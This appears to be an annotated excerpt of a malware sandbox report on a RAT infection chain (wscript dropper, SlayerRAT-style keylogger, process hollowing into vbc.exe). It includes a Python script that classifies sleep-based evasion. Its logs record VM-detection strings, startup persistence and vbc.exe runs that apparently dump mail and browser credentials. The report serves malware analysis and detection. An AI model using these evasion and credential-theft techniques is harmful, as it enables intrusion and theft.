Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Note: the delay values are milliseconds. 922337203685477 is Int64.MaxValue / 10000 (ticks per millisecond), i.e. .NET TimeSpan.MaxValue expressed in milliseconds: the thread parks indefinitely. A thread that never wakes is usually a main thread that has handed control to worker threads or to code injected into another process, so by itself it is not an anti-analysis delay. The 180000 ms (3 min) wait in tmpFB21.tmp.exe is a genuine timed sleep and the value that crosses the report's 3-minute threshold.
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Note: WSH-Timer is the hidden timer window wscript.exe creates to service WScript.Sleep; the hit shows that the script sleeps, not for how long.
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Window / User API: threadDelayed 5377
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Window / User API: threadDelayed 703
Source: C:\Users\user\AppData\Roaming\servieda.exe Window / User API: threadDelayed 5808
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Window / User API: threadDelayed 684
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Window / User API: threadDelayed 9071
May sleep (evasive loops) to hinder dynamic analysis
Note: the "-<N>s" values below are milliseconds despite the suffix (the 180000 reported for TID 5368 is the same 3-minute wait listed above as delay time 180000), and -30000s is the sandbox's 30-second reference; the sleep counts are iterations of a sleep loop, with the 5808 for servieda.exe matching its threadDelayed count above.
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe TID: 2272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\servieda.exe TID: 4188 Thread sleep count: 5808 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe TID: 3084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 340 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148 Thread sleep count: 90 > 30
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476 Thread sleep count: 684 > 30
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476 Thread sleep count: 9071 > 30
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 1236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 4132 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5052 Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -1100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5368 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -922337203685477s >= -30000s
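To make the sleep hits above comparable across samples, the following Python (an added example, not from the report or the sample) parses the report's own line format for the TID-bearing sleep-time and sleep-count lines, treats 922337203685477 ms (Int64.MaxValue / 10000, i.e. .NET TimeSpan.MaxValue in milliseconds) and anything larger as an infinite wait, and classifies each process against the report's thresholds (3 minutes for a long sleep, more than 30 iterations for a sleep loop). The sample lines are copied from this report; the "Thread delayed: delay time" lines in the block above repeat the same waits without thread ids and are deliberately ignored. The verdict names are this example's own.

```python
import re
from collections import defaultdict

# 922337203685477 ms is Int64.MaxValue (2**63 - 1) divided by the 10000 ticks per
# millisecond, i.e. .NET TimeSpan.MaxValue in milliseconds: a wait that never returns.
TIMESPAN_MAX_MS = (2**63 - 1) // 10000
LONG_SLEEP_MS = 3 * 60 * 1000   # the report's ">= 3 min" long-sleep threshold
LOOP_THRESHOLD = 30             # the report's "sleep count > 30" loop threshold

# The "-<N>s" suffix on the sleep-time lines is milliseconds, not seconds: the 180000
# that TID 5368 reports as "-180000s" is the same 3-minute wait listed as "delay time: 180000".
SLEEP_TIME_RE = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s")
SLEEP_COUNT_RE = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+) Thread sleep count: (?P<n>\d+)")

# Sample input: lines copied from the "May sleep (evasive loops)" block of this report.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe TID: 2272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\servieda.exe TID: 4188 Thread sleep count: 5808 > 30
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 340 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148 Thread sleep count: 90 > 30
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476 Thread sleep count: 9071 > 30
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 1236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 4132 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5052 Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -1100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5368 Thread sleep time: -180000s >= -30000s
""".strip().splitlines()


def new_stats():
    return {"infinite_waits": 0, "max_finite_ms": 0, "total_finite_ms": 0,
            "max_loop_count": 0, "threads": set()}


def parse_sleep_lines(lines):
    """Aggregate the report's sleep hits per process image."""
    stats = defaultdict(new_stats)
    for raw in lines:
        line = raw.strip()
        m = SLEEP_TIME_RE.match(line)
        if m:
            s = stats[m["proc"]]
            s["threads"].add(int(m["tid"]))
            ms = int(m["ms"])
            if ms >= TIMESPAN_MAX_MS:     # TimeSpan.MaxValue, or a multiple of it: never wakes up
                s["infinite_waits"] += 1
            else:
                s["max_finite_ms"] = max(s["max_finite_ms"], ms)
                s["total_finite_ms"] += ms
            continue
        m = SLEEP_COUNT_RE.match(line)
        if m:
            s = stats[m["proc"]]
            s["threads"].add(int(m["tid"]))
            s["max_loop_count"] = max(s["max_loop_count"], int(m["n"]))
    return dict(stats)


def classify(s):
    """Map one process's stats to verdict tags (the tag names are this example's own)."""
    verdicts = []
    if s["infinite_waits"]:
        # A thread parked forever: the real work runs on another thread or in an injected process.
        verdicts.append("infinite-wait")
    if s["max_finite_ms"] >= LONG_SLEEP_MS:
        verdicts.append("long-sleep")
    elif s["total_finite_ms"] >= LONG_SLEEP_MS:
        # Several shorter sleeps that add up past the threshold.
        verdicts.append("cumulative-long-sleep")
    if s["max_loop_count"] > LOOP_THRESHOLD:
        # Many short sleeps in a loop: a timing/acceleration check or a wait for user activity.
        verdicts.append("sleep-loop")
    return verdicts


def summarize(lines):
    return {proc: classify(s) for proc, s in parse_sleep_lines(lines).items()}


if __name__ == "__main__":
    for proc, verdicts in summarize(SAMPLE_LINES).items():
        print(f"{proc}: {', '.join(verdicts) or 'none'}")
```

Run against the copied lines, tmpFB21.tmp.exe comes out as infinite-wait plus long-sleep (its largest finite wait is 1100000 ms, well past 3 minutes), tmp87E4.tmp.exe as infinite-wait plus sleep-loop (9071 iterations), servieda.exe as sleep-loop only and Tmp.exe as infinite-wait only; the split separates the processes that actually stall analysis from the ones whose main thread simply parked.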
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 identical queries)
Note: Win32_Processor exposes Name, Manufacturer and NumberOfCores, which evasive samples compare against hypervisor CPU names and low core counts; RATs also read the same class to fingerprint the victim for their check-in, so the query alone does not prove evasion. Which it is here depends on what the code does with the result.
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\servieda.exe Last function: Thread delayed (2 hits)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (2 hits)
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Last function: Thread delayed
Note: the conhost.exe entries are the console hosts for the netsh.exe invocations and idle by design; discount them. The dropped executables ending the run inside a sleep is consistent with the infinite waits listed above.
The following hits carry no signature title in this export. They are generic evasion indicators: a volume-size query (FileFsFullSizeInformation, a common small-disk VM heuristic), a FindFirstFile/FindNextFile enumeration loop in the native code running inside vbc.exe, and the same thread delays as above with their exact values.
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00406EC3
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 140000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000000.00000002.373872355.000001B866570000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWX
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: tmp87E4.tmp.exe.2.dr Binary or memory string: vmware
Source: Tmp.exe, 00000001.00000002.368050117.0000000000690000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
Source: servieda.exe, 00000003.00000002.600571668.000000000067B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: wscript.exe, 00000000.00000003.342673260.000001B8665AF000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy, 14_2_00403C3D
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\servieda.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: Tmp.exe.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Domain query: ia601504.us.archive.org
Source: C:\Windows\System32\wscript.exe Network Connect: 207.241.227.114 187
.NET source code references suspicious native API functions
Source: Tmp.exe.0.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: Tmp.exe.0.dr, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: servieda.exe.1.dr, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: servieda.exe.1.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 2.2.pgr.exe.80000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 2.0.pgr.exe.80000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.602209717.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp, Tmp.exe.0.dr Binary or memory string: Shell_TrayWnd
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp Binary or memory string: Progman
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp Binary or memory string: Program Manager|9kr
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp Binary or memory string: Shell_traywndnlp
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmp Binary or memory string: Shell_traywndG
Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp, servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmp Binary or memory string: Shell_traywnd8
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp Binary or memory string: Program Manager<
Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, Tmp.exe.0.dr Binary or memory string: Shell_traywnd

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
